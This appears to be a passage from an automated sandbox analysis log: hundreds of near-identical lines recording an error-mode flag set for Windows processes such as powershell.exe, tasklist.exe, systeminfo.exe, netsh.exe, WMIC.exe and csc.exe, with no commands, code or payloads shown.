              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
